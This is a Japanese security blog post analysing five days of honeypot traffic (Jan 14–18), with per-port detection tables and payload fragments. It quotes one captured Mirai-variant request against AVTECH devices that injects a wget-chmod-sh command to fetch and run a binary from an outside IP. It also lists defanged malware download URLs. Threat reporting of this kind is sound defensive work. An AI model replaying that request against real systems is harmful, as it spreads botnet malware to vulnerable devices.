sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(164-168日目:1/14-1/18)

ハニーポット簡易分析】Honeytrap簡易分析(164-168日目:1/14-1/18)となります。なかなか、新規の脆弱性もありませんでしたが、Splunkでの検索条件の改善をして見たいと考えています。

Honeytrap簡易分析(164-168日目:1/14-1/18)
※80ポートは除く

f:id:one-chick-sec:20190119094514p:plain

 

f:id:one-chick-sec:20190119094553p:plain

月曜日に検知数が増加していますが、以下のようなRDPの不正アクセスを狙った通信を多数検知していたことが原因となります。
◾️ペイロード
...*%......Cookie: mstshash=Test..........

特定のIPからの通信でなく、複数のIPから検知していました。


<宛先別検知数>
1/14

宛先ポート 検知数 サービス ペイロード
445 965 SMB SMBrS@bPC NETWORK PROGRAM 1.0
8122 196 SSH SSH-2.0-libssh2_1.7.0..
1433 139 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
52869 127 Realtek SDK POST /picsdesc.xml
222 81 SSH SSH-2.0-libssh2_1.7.0..
2222 72 SSH SSH-2.0-libssh2_1.7.0..
3389 72 RDP ...+&......Cookie: mstshash=hello..........
111 67 ? ?
22222 67 SSH SSH-2.0-libssh2_1.7.0..
81 51 GET login.cgi HTTP/1.1 GoAhead Web Server

1/15

宛先ポート 検知数 サービス ペイロード
445 1,082 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 176 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 150 RDP ...+&......Cookie: mstshash=hello..........
2222 71 SSH SSH-2.0-libssh2_1.7.0..
22222 63 SSH SSH-2.0-libssh2_1.7.0..
222 62 SSH SSH-2.0-libssh2_1.7.0..
6001 60 ? ?
443 53 HTTPS ?
81 53 GET login.cgi HTTP/1.1 GoAhead Web Server
8000 42 ? ?

1/16

宛先ポート 検知数 サービス ペイロード
445 1,014 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 173 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
81 165 GET login.cgi HTTP/1.1 GoAhead Web Server
443 103 HTTPS ?
8080 84 PROXY GET / HTTP/1.1
6002 76 ? ?
102 74 TSAP ?
3389 66 RDP ...+&......Cookie: mstshash=hello..........
2222 65 SSH SSH-2.0-libssh2_1.7.0..
22222 61 SSH SSH-2.0-libssh2_1.7.0..

1/17

宛先ポート 検知数 サービス ペイロード
445 1,094 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 186 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
50022 157 SSH SSH-2.0-libssh2_1.7.0..
62222 128 SSH SSH-2.0-libssh2_1.7.0..
443 105 HTTPS ?
2222 65 SSH SSH-2.0-libssh2_1.7.0..
20547 63 ? ?
22222 51 SSH SSH-2.0-libssh2_1.7.0..
3389 50 RDP ...+&......Cookie: mstshash=hello..........
222 43 SSH SSH-2.0-libssh2_1.7.0..

1/18

宛先ポート 検知数 サービス ペイロード
445 1,122 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 170 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 75 RDP ...+&......Cookie: mstshash=hello..........
503 66 ? ?
2222 55 SSH SSH-2.0-libssh2_1.7.0..
443 55 HTTPS ?
52869 45 Realtek SDK POST /picsdesc.xml
22222 36 SSH SSH-2.0-libssh2_1.7.0..
81 36 GET login.cgi HTTP/1.1 GoAhead Web Server
8888 36 HyperVM HTTPS ?

全体の傾向としてはSSHが多い傾向でした。

また、AVTECHの脆弱性を突くMirai亜種の攻撃をポート 8000 で検知していました。80ポートでは検知していると他のハニーポッタも言っていましたが、様々なポートへ発生しているようです。

GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://185[.]244[.]25[.]114/kalon[.]arm5;chmod%20777%20kalon.arm5;sh%20kalon.arm5)&password=admin HTTP/1.1

取得を試みようとしているマルウェアVirusTotalで判断出来ませんでしたか、おそらくMirai亜種もしくはGafgyt亜種と思われます。

<新規マルウェア

ポート マルウェアダウンロード先 VT
52869 hxxp://168[.]235[.]82[.]199/D[.]mips

VirusTotal

52869 hxxp://168[.]235[.]82[.]199/Demon[.]mips VirusTotal
52869 hxxp://168[.]235[.]82[.]199/MaXDdTY/Demon[.]mips VirusTotal
52869 hxxp://168[.]235[.]82[.]199/MaXDdTY/bins[.]sh VirusTotal
52869 hxxp://k[.]silynigr[.]xyz/bins/qlu[.]mips

VirusTotal

パス部分にMaXDdTYの文字列が含まれていますが、何を意味するかまでは不明でした。新規の脆弱性を狙った攻撃は検知はありませんでした。